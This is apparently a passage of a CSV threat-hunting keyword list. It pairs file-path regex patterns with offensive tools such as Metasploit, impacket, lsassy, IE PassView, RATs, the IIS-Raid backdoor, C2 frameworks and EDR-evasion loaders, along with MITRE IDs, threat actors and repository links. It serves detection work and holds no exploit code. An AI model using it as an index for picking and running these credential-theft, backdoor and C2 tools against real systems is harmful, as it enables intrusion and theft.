"*/ielocalserver.dll*",".{0,1000}\/ielocalserver\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8014"
"*/iepv.exe*",".{0,1000}\/iepv\.exe.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8015"
"*/ieshell32.dll*",".{0,1000}\/ieshell32\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8016"
"*/Ignis RAT V1_YKW.exe*",".{0,1000}\/Ignis\sRAT\sV1_YKW\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","8017"
"*/IHxExec.exe*",".{0,1000}\/IHxExec\.exe.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","8018"
"*/IHxExec.git*",".{0,1000}\/IHxExec\.git.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","8019"
"*/IHxExec-main.zip*",".{0,1000}\/IHxExec\-main\.zip.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","8020"
"*/iis_controller.py*",".{0,1000}\/iis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","8021"
"*/IIS-Raid.git*",".{0,1000}\/IIS\-Raid\.git.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","8022"
"*/ike-crack.*",".{0,1000}\/ike\-crack\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","8023"
"*/Ikeext-Privesc.git*",".{0,1000}\/Ikeext\-Privesc\.git.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","8024"
"*/IKEForce*",".{0,1000}\/IKEForce.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/SpiderLabs/ikeforce","1","0","#linux","N/A","N/A","3","241","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z","8025"
"*/ike-version.nse*",".{0,1000}\/ike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8026"
"*/imap-brute.nse*",".{0,1000}\/imap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8027"
"*/imap-capabilities.nse*",".{0,1000}\/imap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8028"
"*/imap-ntlm-info.nse*",".{0,1000}\/imap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8029"
"*/IMDSpoof.git*",".{0,1000}\/IMDSpoof\.git.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","8030"
"*/imfiver/CVE-2022-0847*",".{0,1000}\/imfiver\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","N/A","3","280","78","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z","8031"
"*/Imminent Monitor 3.9.exe*",".{0,1000}\/Imminent\sMonitor\s3\.9\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","1","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","8032"
"*/ImminentMonitor.exe*",".{0,1000}\/ImminentMonitor\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","1","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","8033"
"*/impacket.*",".{0,1000}\/impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8034"
"*/impacket.git*",".{0,1000}\/impacket\.git.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8035"
"*/impacket.zip*",".{0,1000}\/impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8036"
"*/impacket/*",".{0,1000}\/impacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8037"
"*/impacketfile.py*",".{0,1000}\/impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","8038"
"*/Impersonate.exe*",".{0,1000}\/Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","8039"
"*/impersonate.git*",".{0,1000}\/impersonate\.git.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","8040"
"*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","8041"
"*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8042"
"*/impersonate-rs*",".{0,1000}\/impersonate\-rs.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","8043"
"*/imperun * *cmd.exe /c whoami*",".{0,1000}\/imperun\s.{0,1000}\s.{0,1000}cmd\.exe\s\/c\swhoami.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","8044"
"*/Imperva_gzip_WAF_Bypass*",".{0,1000}\/Imperva_gzip_WAF_Bypass.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","network exploitation tool","N/A","2","157","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z","8045"
"*/implant/callback*",".{0,1000}\/implant\/callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","8046"
"*/implant/elevate/*",".{0,1000}\/implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8047"
"*/implant/register_cmd*",".{0,1000}\/implant\/register_cmd.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","8048"
"*/implants/*/Syscalls.*",".{0,1000}\/implants\/.{0,1000}\/Syscalls\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8049"
"*/ImplantSSP.exe*",".{0,1000}\/ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8050"
"*/impress-remote-discover.nse*",".{0,1000}\/impress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8051"
"*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","8052"
"*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","8053"
"*/include/KaynStrike.h*",".{0,1000}\/include\/KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","8054"
"*/infection_monkey/*",".{0,1000}\/infection_monkey\/.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8055"
"*/InflativeLoading.git*",".{0,1000}\/InflativeLoading\.git.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8056"
"*/InflativeLoading.py*",".{0,1000}\/InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8057"
"*/InflativeLoading-main.zip*",".{0,1000}\/InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8058"
"*/Infoga*",".{0,1000}\/Infoga.{0,1000}","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/m4ll0k/Infoga","1","0","#linux","N/A","N/A","1","93","9","2024-07-31T03:44:56Z","2024-06-22T08:52:37Z","8059"
"*/informix-brute.nse*",".{0,1000}\/informix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8060"
"*/informix-query.nse*",".{0,1000}\/informix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8061"
"*/informix-tables.nse*",".{0,1000}\/informix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8062"
"*/inject.cpp*",".{0,1000}\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","8063"
"*/Inject/Dll/LoadDll*",".{0,1000}\/Inject\/Dll\/LoadDll.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8064"
"*/Inject/PE/*.cs*",".{0,1000}\/Inject\/PE\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8065"
"*/Inject/ShellCode/*.cs*",".{0,1000}\/Inject\/ShellCode\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8066"
